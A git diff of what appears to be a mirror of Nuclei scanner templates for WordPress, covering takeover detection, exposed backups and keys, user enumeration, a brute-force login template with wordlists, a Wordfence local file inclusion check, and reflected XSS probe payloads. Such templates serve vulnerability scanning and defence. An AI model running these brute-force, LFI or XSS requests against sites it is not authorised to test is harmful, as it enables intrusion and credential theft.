- GET /wp-content/uploads/simple-file-list/{{filepath}}.php HTTP/1.1
+ GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
Host: {{Hostname}}
-
+ Accept: */*
+ Connection: close
matchers-condition: and
matchers:
- type: word
+ words:
+ - 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
part: body
+ - type: word
words:
- - "aa5be3e9dec96f2f1a593b2f5b2288af"
- - "PHP Version"
- - "Configuration Command"
- condition: and
-
+ - 'text/html'
+ part: header
- type: status
status:
- 200
-
-# digest: 4a0a0047304502210088879930bf5b174bea66061e2d725fb2e206648d3a8f13f3a36b8f10ca64be7b022069e37edf7eff0d66f5ce9627d277362b44bf27f57aeda0c3127303d0466a8b8d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-takeover-11312.yaml b/poc/wordpress/wordpress-takeover-11312.yaml
deleted file mode 100644
index ce2834c9c3..0000000000
--- a/poc/wordpress/wordpress-takeover-11312.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: wordpress-takeover
-info:
- name: WordPress takeover detection
- author: pdcommunity & geeknik
- severity: high
- tags: takeover,wordpress
- reference: https://github.com/EdOverflow/can-i-take-over-xyz
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- redirects: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Do you want to register"
- - ".wordpress.com</em> doesn’t exist"
- condition: and
- - type: word
- words:
- - "cannot be registered"
- negative: true
diff --git a/poc/wordpress/wordpress-takeover-11314.yaml b/poc/wordpress/wordpress-takeover-11314.yaml
new file mode 100644
index 0000000000..536222d6ef
--- /dev/null
+++ b/poc/wordpress/wordpress-takeover-11314.yaml
@@ -0,0 +1,26 @@
+id: wordpress-takeover
+
+info:
+ name: WordPress takeover detection
+ author: pdteam,geeknik
+ severity: high
+ tags: takeover,wordpress
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Do you want to register"
+ - ".wordpress.com</em> doesn’t exist"
+ condition: and
+
+ - type: word
+ words:
+ - "cannot be registered"
+ negative: true
diff --git a/poc/wordpress/wordpress-takeover.yaml b/poc/wordpress/wordpress-takeover.yaml
index 48ea0d7f5d..ce2834c9c3 100644
--- a/poc/wordpress/wordpress-takeover.yaml
+++ b/poc/wordpress/wordpress-takeover.yaml
@@ -1,36 +1,23 @@
id: wordpress-takeover
-
info:
name: WordPress takeover detection
- author: pdteam,geeknik
+ author: pdcommunity & geeknik
severity: high
- reference:
- - https://github.com/EdOverflow/can-i-take-over-xyz/pull/176
- - https://hackerone.com/reports/274336
- metadata:
- max-request: 1
- tags: takeover,wordpress,hackerone
-
-http:
+ tags: takeover,wordpress
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz
+requests:
- method: GET
path:
- "{{BaseURL}}"
-
+ redirects: true
matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - Host != ip
-
- type: word
words:
- "Do you want to register"
- ".wordpress.com</em> doesn’t exist"
condition: and
-
- type: word
words:
- "cannot be registered"
negative: true
-
-# digest: 4a0a00473045022100b6482b25c273f80d9a829af8433bec2b59e51d3573cae9087a01108defe43e3a02202e6c7f7d7a0d70b367aa80de4ba8b4da27c72dc6f34de442d00125f100b0afa1:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-themes-detect-11316.yaml b/poc/wordpress/wordpress-themes-detect-11316.yaml
new file mode 100644
index 0000000000..5d00b07f78
--- /dev/null
+++ b/poc/wordpress/wordpress-themes-detect-11316.yaml
@@ -0,0 +1,22 @@
+id: wordpress-themes-detect
+info:
+ name: WordPress Theme Detection
+ author: 0xcrypto
+ severity: info
+ tags: fuzz,wordpress
+requests:
+ - raw:
+ - |
+ GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1
+ Host: {{Hostname}}
+ payloads:
+ themeSlug: helpers/wordlists/wordpress-themes.txt
+ threads: 50
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "== Description =="
diff --git a/poc/wordpress/wordpress-themes2.yaml b/poc/wordpress/wordpress-themes2.yaml
index 5d00b07f78..d2f35faefe 100644
--- a/poc/wordpress/wordpress-themes2.yaml
+++ b/poc/wordpress/wordpress-themes2.yaml
@@ -1,22 +1,27 @@
id: wordpress-themes-detect
+
info:
name: WordPress Theme Detection
author: 0xcrypto
severity: info
tags: fuzz,wordpress
+
requests:
- raw:
- |
GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1
Host: {{Hostname}}
+
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
+
threads: 50
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "== Description =="
diff --git a/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml b/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml
index 7135582905..5917f042b4 100644
--- a/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml
+++ b/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml
@@ -1,38 +1,27 @@
id: wordpress-tmm-db-migrate
-
info:
name: WordPress ThemeMarkers DB Migration File
author: dwisiswant0
severity: info
- metadata:
- max-request: 1
tags: wordpress,wp-plugin,backup
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip"
-
max-size: 1000
-
matchers-condition: and
matchers:
- type: word
words:
- "application/zip"
part: header
-
- type: regex
regex:
- "[a-z0-9_]+.dat"
part: body
-
- type: status
status:
- 200
-
- type: binary
binary:
- "504B0304" # zip
-
-# digest: 4a0a004730450220784c4949c81d41d015fe88f4c37efe926c1cc3d4b98a0c9a98fa1a297072991e022100cd5f7da1d8d976b9cfecda7d1084d64f5dfcd249b3b6947d424793b0fcb08824:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-tmm-db-migrate-11319.yaml b/poc/wordpress/wordpress-tmm-db-migrate-11319.yaml
index bbd95462b5..7135582905 100644
--- a/poc/wordpress/wordpress-tmm-db-migrate-11319.yaml
+++ b/poc/wordpress/wordpress-tmm-db-migrate-11319.yaml
@@ -4,14 +4,17 @@ info:
name: WordPress ThemeMarkers DB Migration File
author: dwisiswant0
severity: info
+ metadata:
+ max-request: 1
tags: wordpress,wp-plugin,backup
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip"
max-size: 1000
+
matchers-condition: and
matchers:
- type: word
@@ -30,4 +33,6 @@ requests:
- type: binary
binary:
- - "504B0304" # zip
\ No newline at end of file
+ - "504B0304" # zip
+
+# digest: 4a0a004730450220784c4949c81d41d015fe88f4c37efe926c1cc3d4b98a0c9a98fa1a297072991e022100cd5f7da1d8d976b9cfecda7d1084d64f5dfcd249b3b6947d424793b0fcb08824:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml
index 02d1675a3f..47fe8b3995 100644
--- a/poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml
+++ b/poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml
@@ -3,7 +3,8 @@ info:
name: WordPress Total Upkeep Database and Files Backup Download
author: princechaddha
severity: high
- reference: https://www.exploit-db.com/exploits/49252
+ reference:
+ - https://www.exploit-db.com/exploits/49252
tags: wordpress,wp-plugin
requests:
- method: GET
diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml
index a87b8fda8d..02d1675a3f 100644
--- a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml
+++ b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml
@@ -1,36 +1,26 @@
id: wordpress-total-upkeep-backup-download
-
info:
name: WordPress Total Upkeep Database and Files Backup Download
author: princechaddha
severity: high
- reference:
- - https://www.exploit-db.com/exploits/49252
- metadata:
- max-request: 1
- tags: wordpress,wp-plugin,edb
-
-http:
+ reference: https://www.exploit-db.com/exploits/49252
+ tags: wordpress,wp-plugin
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
-
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
-
- type: word
words:
- '"filepath"'
- '/wp-content/boldgrid_backup_'
condition: and
part: body
-
- type: status
status:
- 200
-
-# digest: 4a0a004730450220740af42e52a68f0d6689e8a42beeed0b3a97aae6409f3ada8410b0de03a612e5022100a5a7de364e6d563966439fb830a1e355ce145bd70d1b17e1704dd01f1911e9b0:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-updraftplus-pem-key-11325.yaml b/poc/wordpress/wordpress-updraftplus-pem-key-11325.yaml
new file mode 100644
index 0000000000..cfebdb2e99
--- /dev/null
+++ b/poc/wordpress/wordpress-updraftplus-pem-key-11325.yaml
@@ -0,0 +1,23 @@
+id: updraftplus-pem-keys
+info:
+ name: UpdraftPlus Plugin Pem Key
+ author: dhiyaneshDk
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6437
+ tags: wordpress,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of /"
+ - ".pem"
+ - "updraftplus"
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-updraftplus-pem-key-11327.yaml b/poc/wordpress/wordpress-updraftplus-pem-key-11327.yaml
deleted file mode 100644
index 60ce155fd0..0000000000
--- a/poc/wordpress/wordpress-updraftplus-pem-key-11327.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: updraftplus-pem-keys
-info:
- name: UpdraftPlus Plugin Pem Key
- author: dhiyaneshDk
- severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6437
- tags: wordpress,wp-plugin
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Index of /"
- - ".pem"
- - "updraftplus"
- condition: and
- part: body
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wordpress-updraftplus-pem-key-11328.yaml b/poc/wordpress/wordpress-updraftplus-pem-key-11328.yaml
index 90f297f2fa..60ce155fd0 100644
--- a/poc/wordpress/wordpress-updraftplus-pem-key-11328.yaml
+++ b/poc/wordpress/wordpress-updraftplus-pem-key-11328.yaml
@@ -1,17 +1,15 @@
id: updraftplus-pem-keys
-
info:
name: UpdraftPlus Plugin Pem Key
author: dhiyaneshDk
severity: info
- reference: https://www.exploit-db.com/ghdb/6437
+ reference:
+ - https://www.exploit-db.com/ghdb/6437
tags: wordpress,wp-plugin
-
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/updraftplus/includes/'
-
matchers-condition: and
matchers:
- type: word
@@ -21,7 +19,6 @@ requests:
- "updraftplus"
condition: and
part: body
-
- type: status
status:
- 200
diff --git a/poc/wordpress/wordpress-updraftplus-pem-key.yaml b/poc/wordpress/wordpress-updraftplus-pem-key.yaml
index cfebdb2e99..fdc0197b59 100644
--- a/poc/wordpress/wordpress-updraftplus-pem-key.yaml
+++ b/poc/wordpress/wordpress-updraftplus-pem-key.yaml
@@ -1,14 +1,20 @@
id: updraftplus-pem-keys
+
info:
name: UpdraftPlus Plugin Pem Key
author: dhiyaneshDk
severity: info
- reference: https://www.exploit-db.com/ghdb/6437
- tags: wordpress,wp-plugin
-requests:
+ reference:
+ - https://www.exploit-db.com/ghdb/6437
+ metadata:
+ max-request: 1
+ tags: wp-plugin,edb,wordpress
+
+http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/updraftplus/includes/'
+
matchers-condition: and
matchers:
- type: word
@@ -18,6 +24,9 @@ requests:
- "updraftplus"
condition: and
part: body
+
- type: status
status:
- 200
+
+# digest: 4b0a00483046022100f67881c034eb94b3163dd7e7e724002d05ef5d68777ecabd4a0f6e1ddaec2b4a022100eaa8e0704e2f22d863e7eafda11a6a3fedd0088891a706f52eb74c79fa6a1a9c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-user-enum-11333.yaml b/poc/wordpress/wordpress-user-enum-11333.yaml
index e938ce3114..1cd64aba82 100644
--- a/poc/wordpress/wordpress-user-enum-11333.yaml
+++ b/poc/wordpress/wordpress-user-enum-11333.yaml
@@ -4,9 +4,11 @@ info:
name: Wordpress User Enumeration
author: r3dg33k
severity: info
+ metadata:
+ max-request: 1
tags: wordpress
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/?author=1"
@@ -17,6 +19,7 @@ requests:
regex:
- '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+'
part: header
+
- type: status
status:
- 301
@@ -26,3 +29,5 @@ requests:
part: header
regex:
- 'author\/\w+'
+
+# digest: 4a0a00473045022100a9bd51a7335e4a3132dc7adf1b5faad143902b92a257ce67c7554206bb1208e60220524362849327f5644ce5e078f58218d5ed17ceaa3b90982ac8eb73b44b8348d5:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-weak-credentials-11334.yaml b/poc/wordpress/wordpress-weak-credentials-11334.yaml
index a33d776810..4571be435c 100644
--- a/poc/wordpress/wordpress-weak-credentials-11334.yaml
+++ b/poc/wordpress/wordpress-weak-credentials-11334.yaml
@@ -1,8 +1,17 @@
id: wordpress-weak-credentials
info:
- name: WordPress Weak Credentials
+ name: WordPress - Weak Credentials
author: evolutionsec
severity: critical
+ description: |
+ Weak WordPress Credentials were discovered.
+ reference:
+ - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+ cvss-score: 5.8
+ cve-id:
+ cwe-id: CWE-522
tags: wordpress,default-login,fuzz
requests:
- raw:
@@ -22,12 +31,14 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- - type: status
- status:
- - 302
- type: word
+ part: header
words:
- '/wp-admin'
- 'wordpress_logged_in'
condition: and
- part: header
+ - type: status
+ status:
+ - 302
+
+# Enhanced by mp on 2022/05/19
diff --git a/poc/wordpress/wordpress-weak-credentials-11336.yaml b/poc/wordpress/wordpress-weak-credentials-11336.yaml
new file mode 100644
index 0000000000..a4747ae6ab
--- /dev/null
+++ b/poc/wordpress/wordpress-weak-credentials-11336.yaml
@@ -0,0 +1,43 @@
+id: wordpress-weak-credentials
+info:
+ name: WordPress - Weak Credentials
+ author: evolutionsec
+ severity: critical
+ description: |
+ Weak WordPress Credentials were discovered.
+ reference:
+ - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+ cvss-score: 5.8
+ cwe-id: CWE-522
+ tags: wordpress,default-login,fuzz
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Referer: {{BaseURL}}
+
+ log={{users}}&pwd={{passwords}}
+ payloads:
+ users: helpers/wordlists/wp-users.txt
+ passwords: helpers/wordlists/wp-passwords.txt
+ threads: 50
+ attack: clusterbomb
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - '/wp-admin'
+ - 'wordpress_logged_in'
+ condition: and
+ - type: status
+ status:
+ - 302
+
+# Enhanced by mp on 2022/05/19
diff --git a/poc/wordpress/wordpress-weak-credentials-11337.yaml b/poc/wordpress/wordpress-weak-credentials-11337.yaml
index a4747ae6ab..0bec5f6f85 100644
--- a/poc/wordpress/wordpress-weak-credentials-11337.yaml
+++ b/poc/wordpress/wordpress-weak-credentials-11337.yaml
@@ -1,17 +1,11 @@
id: wordpress-weak-credentials
+
info:
- name: WordPress - Weak Credentials
+ name: WordPress Weak Credentials
author: evolutionsec
severity: critical
- description: |
- Weak WordPress Credentials were discovered.
- reference:
- - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
- cvss-score: 5.8
- cwe-id: CWE-522
tags: wordpress,default-login,fuzz
+
requests:
- raw:
- |
@@ -22,6 +16,7 @@ requests:
Referer: {{BaseURL}}
log={{users}}&pwd={{passwords}}
+
payloads:
users: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
@@ -30,14 +25,13 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
+ - type: status
+ status:
+ - 302
+
- type: word
- part: header
words:
- '/wp-admin'
- 'wordpress_logged_in'
condition: and
- - type: status
- status:
- - 302
-
-# Enhanced by mp on 2022/05/19
+ part: header
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-woocommerce-listing-11339.yaml b/poc/wordpress/wordpress-woocommerce-listing-11339.yaml
index 300e671075..41d380395c 100644
--- a/poc/wordpress/wordpress-woocommerce-listing-11339.yaml
+++ b/poc/wordpress/wordpress-woocommerce-listing-11339.yaml
@@ -4,8 +4,7 @@ info:
author: dhiyaneshDK
severity: info
description: Searches for sensitive directories present in the woocommerce wordpress plugin.
- reference:
- - https://www.exploit-db.com/ghdb/6192
+ reference: https://www.exploit-db.com/ghdb/6192
tags: wordpress,listing,plugin,woocommerce
requests:
- method: GET
diff --git a/poc/wordpress/wordpress-woocommerce-listing-11341.yaml b/poc/wordpress/wordpress-woocommerce-listing-11341.yaml
new file mode 100644
index 0000000000..d483df02d9
--- /dev/null
+++ b/poc/wordpress/wordpress-woocommerce-listing-11341.yaml
@@ -0,0 +1,31 @@
+id: wordpress-woocommerce-listing
+
+info:
+ name: WordPress WooCommerce - Directory Search
+ author: dhiyaneshDK
+ severity: info
+ description: WordPress WooCommerce plugin sensitive directory searches were conducted.
+ reference:
+ - https://www.exploit-db.com/ghdb/6192
+ metadata:
+ max-request: 1
+ tags: edb,wordpress,listing,plugin,woocommerce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/woocommerce/"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4a0a00473045022100ced0f66a337980894542fbe1f4f6ef0cda1d6da743eaba194d4fadc05b0da8f10220259d8b73e86d0cf8bf3b19b6670f436f47a433e601c16941216d38f14c6bb1f9:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-wordfence-lfi-11351.yaml b/poc/wordpress/wordpress-wordfence-lfi-11351.yaml
index c81493f970..28476103e4 100644
--- a/poc/wordpress/wordpress-wordfence-lfi-11351.yaml
+++ b/poc/wordpress/wordpress-wordfence-lfi-11351.yaml
@@ -1,17 +1,11 @@
id: wordpress-wordfence-lfi
-
info:
- name: WordPress Wordfence 7.4.5 - Local File Inclusion
+ name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
author: 0x_Akoko
severity: high
- description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/48061
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
tags: wordpress,wp-plugin,lfi,wordfence
requests:
@@ -24,10 +18,8 @@ requests:
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:.*:0:0"
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/07/29
diff --git a/poc/wordpress/wordpress-wordfence-lfi-11348.yaml b/poc/wordpress/wordpress-wordfence-lfi.yaml
similarity index 100%
rename from poc/wordpress/wordpress-wordfence-lfi-11348.yaml
rename to poc/wordpress/wordpress-wordfence-lfi.yaml
diff --git a/poc/wordpress/wordpress-workflow-11363.yaml b/poc/wordpress/wordpress-workflow-11363.yaml
index 86bf5b16db..e7ce984db9 100644
--- a/poc/wordpress/wordpress-workflow-11363.yaml
+++ b/poc/wordpress/wordpress-workflow-11363.yaml
@@ -3,9 +3,12 @@ info:
name: Wordpress Security Checks
author: kiblyn11,zomsop82
description: A simple workflow that runs all wordpress related nuclei templates on a given target.
+ tags: workflow
workflows:
- - template: technologies/wordpress-detect.yaml
- subtemplates:
- - tags: wordpress
\ No newline at end of file
+ - template: technologies/tech-detect.yaml
+ matchers:
+ - name: wordpress
+ subtemplates:
+ - tags: wordpress
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml
similarity index 100%
rename from poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml
rename to poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml
diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml
similarity index 100%
rename from poc/wordpress/wordpress-xmlrpc-listmethods.yaml
rename to poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml
diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml
index 4395aef47f..2e448ef8c1 100644
--- a/poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml
+++ b/poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml
@@ -4,9 +4,11 @@ info:
name: Wordpress XML-RPC List System Methods
author: 0ut0fb4nd
severity: info
+ metadata:
+ max-request: 1
tags: wordpress
-requests:
+http:
- method: POST
path:
- "{{BaseURL}}/xmlrpc.php"
@@ -18,10 +20,13 @@ requests:
- type: status
status:
- 200
+
- type: word
words:
- "system.multicall"
- "system.listMethods"
- "demo.sayHello"
condition: and
- part: body
\ No newline at end of file
+ part: body
+
+# digest: 4b0a00483046022100f89ca8d4ba199fec678d3455682799a0e86ecb2c3f23f3ead163caf8ad1e6244022100ca471fcbfe8bf77db5ceb8812854aecdb10cf21e1bbc3fab1b155dd6a99ca92d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-zebra-form-xss-11375.yaml b/poc/wordpress/wordpress-zebra-form-xss-11375.yaml
new file mode 100644
index 0000000000..6c0711aee5
--- /dev/null
+++ b/poc/wordpress/wordpress-zebra-form-xss-11375.yaml
@@ -0,0 +1,34 @@
+id: wordpress-zebra-form-xss
+info:
+ name: Wordpress Zebra Form XSS
+ author: madrobot
+ severity: medium
+ reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
+ tags: wordpress,xss
+requests:
+ - raw:
+ - |
+ POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
+ Origin: null
+
+ -----------------------------77916619616724262872902741074
+ Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
+ Content-Type: text/plain
+ Test
+ -----------------------------77916619616724262872902741074--
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "</script><img src onerror=alert(/XSS-form/)>"
+ part: body
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/poc/wordpress/wordpress-zebra-form-xss-11377.yaml b/poc/wordpress/wordpress-zebra-form-xss-11377.yaml
deleted file mode 100644
index bd81293cdb..0000000000
--- a/poc/wordpress/wordpress-zebra-form-xss-11377.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: wordpress-zebra-form-xss
-info:
- name: Wordpress Zebra Form - Cross-Site Scripting
- author: madrobot
- severity: medium
- reference:
- - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
- tags: wordpress,xss
-requests:
- - raw:
- - |
- POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
- Host: {{Hostname}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
- Origin: null
-
- -----------------------------77916619616724262872902741074
- Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
- Content-Type: text/plain
- Test
- -----------------------------77916619616724262872902741074--
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "</script><img src onerror=alert(/XSS-form/)>"
- part: body
- - type: status
- status:
- - 200
- - type: word
- words:
- - "text/html"
- part: header
diff --git a/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml b/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml
deleted file mode 100644
index dc8fd403a8..0000000000
--- a/poc/wordpress/wp-123contactform-plugin-listing-11402.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: wp-123contactform-plugin-listing
-info:
- name: WordPress 123ContactForm Plugin Directory Listing
- author: pussycat0x
- severity: low
- description: Searches for sensitive directories present in the wordpress-plugins plugin.
- reference: |
- - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
- - https://www.exploit-db.com/ghdb/6979
- tags: wordpress,listing
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Index of"
- - "/123contactform-for-wordpress"
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-123contactform-plugin-listing.yaml b/poc/wordpress/wp-123contactform-plugin-listing.yaml
new file mode 100644
index 0000000000..c530b9ee9d
--- /dev/null
+++ b/poc/wordpress/wp-123contactform-plugin-listing.yaml
@@ -0,0 +1,24 @@
+id: wp-123contactform-plugin-listing
+info:
+ name: WordPress 123ContactForm Plugin Directory Listing
+ author: pussycat0x
+ severity: info
+ description: Searches for sensitive directories present in the wordpress-plugins plugin.
+ reference:
+ - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
+ - https://www.exploit-db.com/ghdb/6979
+ tags: wordpress,listing,plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "/123contactform-for-wordpress"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-adaptive-xss-11404.yaml b/poc/wordpress/wp-adaptive-xss-11404.yaml
index f297df178f..6d94693aeb 100644
--- a/poc/wordpress/wp-adaptive-xss-11404.yaml
+++ b/poc/wordpress/wp-adaptive-xss-11404.yaml
@@ -1,12 +1,16 @@
id: wp-adaptive-xss
info:
- name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
+ name: WordPress Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author: dhiyaneshDK
- severity: medium
- description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
+ severity: high
+ description: WordPress Adaptive Images < 0.6.69 is susceptible to cross-site scripting because the plugin does not sanitize and escape the REQUEST_URI before outputting it back in a page.
reference:
- https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
- https://plugins.trac.wordpress.org/changeset/2655683
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
tags: wordpress,xss,wp-plugin,wp
requests:
- method: GET
@@ -26,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/13
diff --git a/poc/wordpress/wp-adaptive-xss.yaml b/poc/wordpress/wp-adaptive-xss.yaml
new file mode 100644
index 0000000000..f297df178f
--- /dev/null
+++ b/poc/wordpress/wp-adaptive-xss.yaml
@@ -0,0 +1,28 @@
+id: wp-adaptive-xss
+info:
+ name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
+ author: dhiyaneshDK
+ severity: medium
+ description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
+ reference:
+ - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
+ - https://plugins.trac.wordpress.org/changeset/2655683
+ tags: wordpress,xss,wp-plugin,wp
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '<img/src/onerror=alert(document.domain)>'
+ - '<td>Image</td>'
+ condition: and
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-altair-listing-11405.yaml b/poc/wordpress/wp-altair-listing-11405.yaml
index f296ad45a5..1824c765a3 100644
--- a/poc/wordpress/wp-altair-listing-11405.yaml
+++ b/poc/wordpress/wp-altair-listing-11405.yaml
@@ -1,17 +1,22 @@
id: wp-altair-listing
+
info:
